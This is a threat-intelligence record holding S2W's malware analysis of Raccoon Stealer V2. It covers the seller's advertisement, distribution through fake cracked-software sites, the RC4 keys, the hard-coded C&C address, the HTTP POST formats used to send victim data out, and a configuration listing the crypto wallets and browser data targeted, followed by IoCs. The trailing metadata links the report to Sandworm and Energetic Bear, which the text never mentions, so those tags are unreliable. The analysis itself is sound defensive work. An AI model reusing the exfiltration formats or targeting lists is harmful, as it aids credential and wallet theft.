{ "id": "df9aa04f-6a1d-4f7f-936f-21f261d98832", "created_at": "2026-04-06T00:15:29.960605Z", "updated_at": "2026-04-10T03:37:08.623299Z", "deleted_at": null, "sha1_hash": "04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e", "title": "Raccoon Stealer is Back with a New Version", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2047789, "plain_text": "Raccoon Stealer is Back with a New Version\r\nBy S2W\r\nPublished: 2022-06-21 · Archived: 2026-04-05 13:44:10 UTC\r\nAuthor: S2W TALON\r\nLast Modified : 2022.06.16.\r\nPress enter or click to view image in full size\r\nPhoto by Gary Bendig on Unsplash\r\nExecutive Summary\r\nOn March 25, 2022, the operator of Raccoon Stealer, who was active on the dark web forum, temporarily\r\nsuspended his activities since a key developer died in the Russia-Ukraine War.\r\nOn May 17, 2022, the operator mentioned that the development of a new version of the stealer was\r\ncompleted, and uploaded details of changes, improvements, and prices to their Telegram channel.\r\nOn June 9, 2022, the operator resumed activities on the dark web forum where they were active and wrote\r\na comment asking for inquiries about Raccoon Stealer V2 to contact via Telegram.\r\nDuring deep \u0026 dark web monitoring, we confirmed that the Stealer log file, which is generated by\r\nRaccoon Stealer V2, has already begun to be traded and shared among cybercriminals.\r\nFrom what has been confirmed so far, it is estimated that attacks using V2 started in earnest in June after\r\nthe testing period.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 1 of 17\n\nAs a result of obtaining and analyzing the Raccoon Stealer V2 sample, it was confirmed that there were no\r\nsignificant differences in the overall execution flow although many parts were changed.\r\nIt is judged that V2 will be continuously updated in the future in that there are unfinished codes compared\r\nto V1 and functions such as analysis interruption.\r\nCurrently, it is distributed in the same way as V1, disguised as Cracked Software, but as it is updated to\r\nV2, continuous monitoring is required to see if there is any change in the distribution method in the future.\r\nRaccoon Stealer Resumes Activity\r\nThe operator of Raccoon Stealer, who has been active on the dark web forum “Exploit”, commented saying that\r\nthe operation was temporarily suspended on his promotional post on March 25th. The “special operation” that the\r\noperator referred to in the text was known as the Russia-Ukraine War, which killed one of the key developers of\r\nthe Raccoon Stealer project, making the project no longer stable.\r\nIn a later post, the operator promised that they weren’t going out of business forever and that they would return in\r\na few months to work on a second version. It was also mentioned that since the core developers can no longer\r\nparticipate, they will redevelop a new builder program and admin panel.\r\nQuaxar is S2W’s CTI solution that enhances your organization’s cybersecurity through monitoring and\r\nmonitoring.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 2 of 17\n\nOn June 9th, about three and a half months later, the operator of Raccoon Stealer answered a user’s question about\r\nwhether it was right to return and worked on Raccoon Stealer V2 to transform it into a completely new stealer\r\ncompared to V1. It was also mentioned that the details will be provided after finishing the test period and that it\r\nwill be officially released in about two weeks.\r\nPress enter or click to view image in full size\r\nAfter the last post asking to inquire about V2 to contact via Telegram was uploaded, the original promotional post\r\nwas closed by the moderator so that users can no longer comment on the post to prevent confusion.\r\nPress enter or click to view image in full size\r\nThe operator of Raccoon Stealer uploaded a notice about the new version on May 17th, and they claimed that V2\r\nhas the following advantages over V1.\r\nProcesses such as generating stealer by builder program, log processing, etc. are all fully automated\r\nWritten in C/C++, which significantly increased the speed of work\r\nLow AV detection rate\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 3 of 17\n\nExpanded target to collect\r\nBuilt-in file downloader\r\nWorks on both 32 and 64-bit systems without .NET dependencies\r\nAll strings are heavily encrypted\r\nIn addition, the following features were mentioned for the admin panel.\r\nFast log processing\r\nFlexible search and filter system provided\r\nLatest log status updates\r\nCSV export, Log Preview, Browsing GEO, Mass deletion, etc\r\nThe pricing policy for the new version is as follows.\r\n$275 for 1 month of use ($75 increase over V1)\r\n$125 for 1 week of use ($50 increase over V1)\r\nIn addition to this, various improvements to the backend server and collection are specified on the telegram\r\nchannel.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 4 of 17\n\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 5 of 17\n\nRaccoon Stealer. We steal, you deal!\r\nOur team is proud to present you the result of their many months of work.\r\nNever before has the process of mining logs been so easy and intuitive. And sorting is so fast and\r\nconvenient. We took care of all the routine work moments that were wasting your precious time and\r\nnerves, allowing you to concentrate on the most important thing — increasing your profits.\r\nYou can forget about the countless raising of servers and pads, assembling builds and all the hassle\r\nassociated with this. Now the process is fully automated: you just need to make a few mouse clicks.\r\nOur specialists carried out parallel development in three areas: Software, Front-end, Back-end. This\r\nprovided an opportunity to focus on specific tasks and get a comprehensively developed product at the\r\nfinish line.\r\nFresh software\r\n1. Own code. Our build is not a fork of already existing products on the market.\r\n2. The stealer is written in C/C++, which significantly increased the speed of work.\r\n3. Our build will give you an excellent response with every spill, because the Raccoon is noticed by a\r\nfew antiviruses in a dynamic test.\r\n4. Raccoon collects: passwords, cookies and autofill from all popular browsers (including FireFox x64),\r\nCC data, system information, almost all existing cryptocurrency desktop wallets.\r\n5. Built-in file downloader.\r\n6. Works on both 32 and 64-bit systems without .NET dependencies.\r\n7. Output file — Native x86 executable is easy to encrypt.\r\n8. Private key, gate address and all other string values are heavily encrypted.\r\nIntuitive and concise control panel\r\n1. It is so fast and simple that with its help it will not be difficult for a child to learn how to process\r\nlogs. Everything that used to take up the workspace is hidden in one click, and the necessary functions\r\nare easy to find by hover tooltips.\r\n2. The design is completely devoid of distracting and useless elements, nothing else can interfere with\r\nyour work.\r\n3. Flexible search and filter system gives you unlimited sorting options.\r\n4. The latest system of log statuses: each is marked as *new*, *open* or *double*.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 6 of 17\n\n5. You can’t taste the candy without opening the wrappers. The opened status will show that the log has\r\nalready been opened.\r\n6. No more spills in several hands from unscrupulous traffickers! Duplicate logs will be marked with\r\nthe double status.\r\n6. The unique ability to delegate logs will increase the efficiency of your team. Everyone will receive\r\nmaterial for their needs.\r\n…\r\nChanged stealer log\r\nRecently, while monitoring the deep and dark web, a log of Raccoon Stealer V2, which is being traded and shared\r\namong cybercriminals, was newly secured. The biggest difference compared to the log in V1 is that from V2, the\r\nRaccoon-shaped signature is included in the log. Also, some field names were changed, and computer names were\r\nexcluded. Other than that, only some batches were changed, and it was confirmed that the collected data did not\r\nchange significantly.\r\nPress enter or click to view image in full size\r\nRaccoon Stealer V1 Log (Left) / Raccoon Stealer V2 Log (Right)\r\nAnalysis of New Raccoon Stealer\r\nDistributed under the guise of Cracked Software\r\nAfter a new type of log file was obtained, after analyzing various files, we succeeded in obtaining a sample that\r\nlooked like Raccoon Stealer V2. The sample was distributed through Cracked Software in the same way as other\r\nStealer malware, and it is not easy to determine whether the sample is a new version of Raccoon Stealer without\r\ncareful analysis. In addition, through the analysis of the distribution method, it was confirmed that other Stealer\r\nmalware such as RedLine Stealer were also distributed in the campaign as described in the FakeCrack Campaign\r\nrecently released by Avast.\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 7 of 17\n\nThe confirmed distribution site was a Cracked Software download site called “KEYS TOOL” (keystool[.]com),\r\nand when someone tries to download any program through that site, it connects to the first Redirector page in the\r\nform of “freefiles[number].xyz” domain, and the page connects to the second Redirector page using the “.cfd”\r\ndomain. The second Redirector page introduces a Mediafire link, and the link contains a fake installer file\r\ncontaining Stealer malware.\r\nStealer malware infection procedure\r\nPress enter or click to view image in full size\r\nTechnical Analysis of Raccoon Stealer V2\r\nThe Technical analysis of Raccoon Stealer V2 is as follows.\r\nMD5: 05a000d526a6e95be2b08e650394fa40\r\nSHA-1: b4cf85691dcc7c6e2d709b292056d404e7fb58f0\r\nSHA-256: 40daa898f98206806ad3ff78f63409d509922e0c482684cf4f180faac8cac273\r\nCreation Time: 2021–02–18 16:04:03 UTC\r\nFile name: 4.exe\r\nFile Type: x86, exe\r\nDetailed operation overview\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 8 of 17\n\n1. String decryption\r\nAs in V1, the string required for malicious behavior is extracted using Base64 and RC4 algorithms. The RC4 Key\r\nused at this time is fixed as “edinayarossiya”.\r\nEncrypted String: “VVsEvhkqyZGsN0Qv”\r\nRC4 Key: “edinayarossiya”\r\nDecrypted String: “\\cookies.txt”\r\n2. Extract the C\u0026C server address\r\nRaccoon Stealer V2 can contain up to 5 C\u0026C server addresses, which are encrypted and hard-coded with spaces\r\nin the Raccoon Stealer. Before decrypting the C\u0026C server, all spaces are removed and extracted in the same way\r\nas in 1. String Decryption. For the RC4 Key used at this time, a key different from that of other string decryption\r\nis used.\r\nEncrypted String: “lIdAg3LYd/akTgV0hVwlNF5b “\r\nRC4 Key: “403f7b121a3afd9e8d27f945140b8a92”\r\nDecrypted String: “http://2.58.56.247”\r\n3. Check the country of the infected device\r\nIt collects the “Locale Name” of the infected device through GetUserDefaultLocaleName function and checks\r\nwhether the string “ru” is included, but after checking, no other action is implemented yet.\r\n4. Create a mutex\r\nDuplicate execution is prevented through mutex. To prevent the malware to be started twice, the process executed\r\nlater is terminated.\r\n5. Check permission\r\nChecks whether the current process is running with “Local System” privileges. In V1, when running with Local\r\nSystem privileges, the token of explorer.exe was duplicated and executed with the privileges, but in V2, this\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 9 of 17\n\nfunction is not yet fully implemented.\r\n6. Send basic information about the infected devices\r\nThe basic information about the infected device is collected and sent first. At this time, the information includes\r\nthe “MachineGuid” and “Username” used to identify the infected device.\r\nPOST / HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nUser-Agent: recordmachineId=[MachineGuid]|[Username]\u0026configId=[RC4 Key used in 2. Extract C\u0026C server\r\n7. Receive configuration information from C\u0026C\r\nWhen the basic information about the infected device is sent, the configuration information necessary for\r\nmalicious behavior is received from the C\u0026C Server. The entire configuration information is as follows, and it has\r\nbeen changed from the JSON format in V1 to the custom format now. This information includes various fields\r\nsuch as library file name and download address, target wallet software, log file name, and target local file.\r\nData format in configuration information: [Field]_[Filename]:[Detailed Information]\r\nlibs_nss3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll\r\nlibs_msvcp140:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll\r\nlibs_vcruntime140:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll\r\nlibs_mozglue:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll\r\nlibs_freebl3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll\r\nlibs_softokn3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\nlibs_sqlite3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll\r\news_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings\r\news_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings\r\nwlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*\r\nwlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*\r\nwlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*\r\nwlts_binance:Binance;26;Binance;*app-store.*;-\r\nwlts_coinomi:Coinomi;28;Coinomi\\Coinomi\\wallets;*;-\r\nwlts_electrum:Electrum;26;Electrum\\wallets;*;-\r\nwlts_elecltc:Electrum-LTC;26;Electrum-LTC\\wallets;*;-\r\nwlts_elecbch:ElectronCash;26;ElectronCash\\wallets;*;-\r\nwlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*\r\nwlts_green:BlockstreamGreen;28;Blockstream\\Green;*;cache,gdk,*logs*\r\nwlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings\r\nsstmnfo_System Info.txt:System Information:\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 10 of 17\n\n|Installed applications:\r\n|\r\nlibs_nssdbm3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll\r\nwlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*\r\nwlts_mymonero:MyMonero;26;MyMonero;*;*cache*\r\nwlts_xmr:Monero;5;Monero\\\\wallets;*.keys;-\r\nwlts_wasabi:Wasabi;26;WalletWasabi\\\\Client;*;*tor*,*log*\r\news_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings\r\news_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB\r\news_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings\r\news_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings\r\news_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings\r\news_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings\r\news_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB\r\news_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings\r\news_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings\r\news_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings\r\news_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings\r\news_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings\r\news_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings\r\news_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settings\r\news_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings\r\news_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings\r\news_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings\r\news_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings\r\news_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension Settings\r\news_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension Settings\r\news_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings\r\news_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings\r\news_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings\r\news_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings\r\news_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings\r\news_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings\r\news_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings\r\news_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings\r\news_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings\r\news_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings\r\news_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings\r\news_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settings\r\nscrnsht_Screenshot.jpeg:1\r\ntlgrm_Telegram:Telegram Desktop\\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*\r\ntoken:1262c07cd3b0beaeb6f46b66fbfdf307\r\n8. Set the working path and download library files\r\nGet S2W’s stories in your inbox\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 11 of 17\n\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nDownload normal library files required for collection from the C\u0026C server by referring to the libs_ field included\r\nin the configuration information.\r\nField: libs_[DLL Filename]:[Download Address]\r\nWorking Path: C:\\Users\\[Username]\\AppData\\LocalLow\r\nDownloaded DLLs\r\n— nss3.dll\r\n— msvcp140.dll\r\n— vcruntime140.dll\r\n— mozglue.dll\r\n— freebl3.dll\r\n— softokn3.dll\r\n— sqlite3.dll\r\n— nssdbm3.dll\r\n9. Add environment variable\r\nAdd the specific path included within the Raccoon Stealer to the environment variable, as well as the working\r\npath specified in 8. Set working path and download library.\r\nC:\\Windows\\system32;\r\nC:\\Windows;\r\nC:\\Windows\\System32\\Wbem;\r\nC:\\Windows\\System32\\WindowsPowerShell\\\\v1.0\\\\;\r\nC:\\Users\\[Username]\\AppData\\LocalLow;\r\n[Working Path]\r\n10. Send detailed information about the infected device\r\nThe detailed information about the infected device is sent to the C\u0026C server by referring to the sstmnfo_ field in\r\nthe configuration information. The information collected and sent is as follows, and if it is successfully sent, a\r\n“receive” message is received from the server. In V1, a file containing the information is created on the infected\r\ndevice, but in V2, the information is sent directly to the C\u0026C server without creating a file.\r\nPOST /[token] HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=[Random 16byte String]\r\nUser-Agent: record\r\nHost: 2.58.56.247\r\nContent-Length: 6854\r\nConnection: Keep-Alive\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 12 of 17\n\nCache-Control: no-cache–[Random 16byte String]\r\nContent-Disposition: form-data; name=\"file\"; filename=\"System Info.txt\"\r\nContent-Type: application/x-objectSystem Information:\r\n - Locale: Korean\r\n - Time zone: +540 minutes from GMT\r\n - OS: Windows 10 Enterprise N\r\n - Architecture: x64\r\n - CPU: Intel(R) Core(TM) i9-9880H CPU @ 2.30GH (4 cores)\r\n - RAM: 8191 MB\r\n - Display size: 2560x1331\r\n - Display Devices:\r\n 0) VMware SVGA 3DInstalled applications:\r\n [Application List]--[Random 16byte String]--\r\n11. Exfiltrate stolen data from the infected device\r\nSearch and steal the target information and files to be collected by referring to the configuration information\r\nreceived in 7. Receive configuration information from C\u0026C. The target information is as follows.\r\nData stored in the browser: Credentials, Profile, Autofill, Cookies, Credit card information, etc.\r\nBrowser-based wallet extension: Data for each browser-based wallet extension by referring to the\r\nconfiguration information (MetaMask, TronLink, BinanceChain, Ronin, coinomi, electrum, etc.)\r\nWallet software: By referring to the configuration information, wallet data for each wallet software\r\n(exodus, atomic, jaxx, binance, coinomi, electrum, etc.) and the “wallet.dat’ file in local drives\r\nSpecific files in the local drives\r\nTelegram related data\r\nScreenshot of the infected device\r\nThe meaning of each field specified in the configuration information is as follows.\r\nPress enter or click to view image in full size\r\n12. Support for executing additional commands and downloading additional malware\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 13 of 17\n\nIf the ldr field exists in the configuration information, additional commands or processes are executed, or\r\nadditional malware is downloaded and executed.\r\nCompare Raccoon Stealer V1 and V2\r\nCommonality\r\n1. Same packer\r\nBoth Raccoon Stealer V1 and V2 use the same packer. This packer was used not only in Raccoon Stealer, but also\r\nin Vidar, KPot, and other stealers. The characteristic of this packer is that it is difficult to know which malware is\r\nincluded by creating a binary that wraps the internal malware, and it is very difficult to create an automated\r\nunpacker tool.\r\nPress enter or click to view image in full size\r\n2. String decryption\r\nBoth V1 and V2 extract strings necessary for malicious behavior using Base64 and RC4 algorithms. Also, it is the\r\nsame that the C\u0026C server is hard-coded in the form of a string with a lot of spaces.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 14 of 17\n\n3. Working path\r\nThe working path used for library download and storage is also used in V2.\r\nWorking path: %USERPROFILE%\\AppData\\LocalLow\r\nDifference\r\n1. Query format\r\nRaccoon Stealer sends the MachineGuid value and username of the infected device before sending detailed\r\ninformation and stolen data. While the Token value is encrypted in the Raccoon Stealer V1, it is hard-coded in\r\nplaintext in the Raccoon Stealer V2. In addition, this value is used as the RC4 Key value for decrypting the C\u0026C\r\nserver in the Raccoon Stealer V2.\r\nQuery format in V1\r\n— b=[MachineGuid]_[Username]\u0026c=[Token]\u0026f=json\r\nQuery format in V2\r\n— machineId=[MachineGuid]|[Username]\u0026configId=[Token]\r\n2. Configuration information format\r\nRaccoon Stealer receives the configuration information necessary for malicious behavior from the C\u0026C server,\r\nand the format of the configuration information was changed in V2. In V1, JSON format was used, but in V2 uses\r\na custom format using “:”, “;”.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 15 of 17\n\n3. How to send stolen data\r\nIn V1, after creating a log file in the working path, the directory is compressed and sent to the C\u0026C server.\r\nHowever, in V2, it is no longer created as a file and immediately sent to the C\u0026C server.\r\n4. How to get the C\u0026C server address\r\nIn V1, Google Drive and Telegram channels were used as a channel to obtain the C\u0026C server address\r\ndynamically, but in V2, this feature has not yet been confirmed and the C\u0026C server address is hard-coded in the\r\nstealer.\r\nConclusion\r\nAs a result of the analysis, it has been confirmed that this malware is the V2 version of the Raccoon\r\nStealer, and it is clear that Raccoon Stealer has resumed its operation in that Stealer logs are already being\r\ntraded and shared among cybercriminals.\r\nAs the Raccoon Stealer operator becomes active again, there is a possibility that existing users will return\r\nto Raccoon Stealer, so it is necessary to prepare for Raccoon Stealer V2.\r\nIt is judged that V2 will be continuously updated in the future in that there are still unfinished codes and\r\nfeatures compared to V1.\r\nCurrently, it is distributed in the same way as V1, disguised as Cracked Software, but as it is updated to V2,\r\ncontinuous monitoring is required to see if there is any change in the distribution method in the future\r\nReference\r\nhttps://blog.avast.com/fakecrack-campaign\r\nhttps://medium.com/s2wblog/deep-analysis-of-raccoon-stealer-5da8cbbc4949\r\nAppendix. A — IoCs\r\n6e5d7b8bc69145a2b65b4be1a2d66a8dbc579e54c09660c4070c5667192864bf\r\nce29b09c57bdd0df33b7d45abe0047952fc009dbc1b5b43351aa6dad751ba262\r\n056a3022c5e70d112e82844d1101e1a591b02960ae0609f06e9930a3f3bd6efa\r\n6f4e7b117124a1b5a27dfd9a7a3e03b46e84000a992e1029f0cfb62bb77fc3f3\r\n6e7e69cd1c9b24f6a36870ec5ae6c31c69022fb48d3fdf59bcda5c1528bc9c04\r\n40daa898f98206806ad3ff78f63409d509922e0c482684cf4f180faac8cac273\r\n59d74f7e172a2ee14e5e43b9704ac95428b28741f1dbadbf5c9279dd37a11f86\r\n0fb5b0562e81ae2a89f61b25cca023adf7f370fe049508c96c6bcf898a63e4d7\r\nf051b93953919cbf673b16ba995a3c1aa58e59dcc256b9eaf1cdd2f6b3c7dfd2\r\n9d66a6a6823aea1b923f0c200dfecb1ae70839d955e11a3f85184b8e0b16c6f8\r\n084754ed1f495ee48a0bfe70b6b5c33ed17bfa129ad03356356ff3a5bf3c46f0\r\nf6d5c0f3f6c5cd498b605e06c6bf49a66c7cbbedf3480cb3a95229b4dc91e81d\r\na988a4f3652eaa34b874080da1cbb70223bac6760e318064f4f23b69bf823330\r\ne2b87b9ea8bb2bf835cb064845ff863253f3eedb4a88122598eee52c9579b203\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 16 of 17\n\n03a8531989aeeec1befecbba4f3ee218309306224bd22b7e52104537e32bacd6\r\n0adc96946d9806969375212cfd5012f93cb205c1008b935f6886ba0ffe7fe262\r\n516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e\r\na25fd13894644550fa9ca60a046813031e5189d4abe4bbd68ed9e6dcfc85d698\r\n20ca741b731753f1bc981bfceb747dc8f4afb2aeb8694de63114a53d23812161\r\n909875959dd07c5aeb345d5f93e662329866e862eb8bb18d0727aa4d9c72e6eb\r\n99834c9981535b584040fef84af159e5e584927aac4a6a57001ba5ecf1e869c4\r\n494df1513b13c70b1472282b80bdf1a9399ae0d16a90275a5c9fe7cfda6afd0d\r\n9014f5d4a597cdec4ec2d10bf73883b4f0106f62c9938a8c6a59e506b1203e2b\r\n0bc3aa6b692b3873dfdd6942fb0eaba7aab391f1d154df80be1193aa792df0c2\r\n7503d528db92b909ad05d65379e6aae008dfaa3664bcac252d34d7a9f25b2db9\r\nf97835279804b62e667211706cce813179e2571634880770862a5f759fa17c11\r\n567bd8dd69485d8f79edad514e54c085af1490dcc5461a01ee79e57e138b9b10\r\n672fea64c92edc4d937d3132577b65813738bfddeab6a6b3ef35e6fa4b987009\r\n83fd32cace2c2f243a713f93918dafd5458af296d55edd293cf5b8b927466dc7\r\n7c09a54191495c699c04be9e0e2d97cf91d9c4346a37ad751416a2db52636de2\r\nb7104e1420fbcdd4a78b02069f32d4882d38203dcb5f73509b60cc1567dac437\r\nab3d8c58a33fd90eca17dc079eb05469bbe535b16eb653810f134df888e230ce\r\ncddc1e15fcfcb29cfcb3631f1d478640d228fd9ea38c01d347833567970d04e3\r\nc6f111e1b32229232af8af25d714ef8f77e30bbc122c0600076bb42cbe46e22b\r\n61d8e542a34f41b5675daf924a6c21322f0a6aaad9a888b23357c85d29a8f87a\r\n6dfd4a12437cf38a4ecdb24891dbff464602fcbe435cf6c15a643637d7f4e1b0\r\nc7ee80a9387a941d13738ab069f8f055e14ea8bdb12403a81e0166b098fce032\r\nae46253a19c9e846c405b3926655efead40d8f873fef008f896019f34d486dfe\r\n9e5035f075d6aef29ad158c591adf669324a17442c575c6946c5a7f279705f47\r\n6697604c88f0fbb05a6848915d1800eb9a77b607e834c6a01e2bf4a076955a91\r\nd2831378b440b653984e58ba82bd670f30eca0e4f23f14c248c50780883d32c3\r\n2c7563c76c710a3988c14b8246fd8864c37c08b723b0a24e0f4aa876cc5f73c8\r\n502f0a6587cf2d084e98f5edc12192e1ca37515bdf7364511415d615be2e6aa7\r\nSource: https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nhttps://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d" ], "report_names": [ "raccoon-stealer-is-back-with-a-new-version-5f436e04b20d" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], 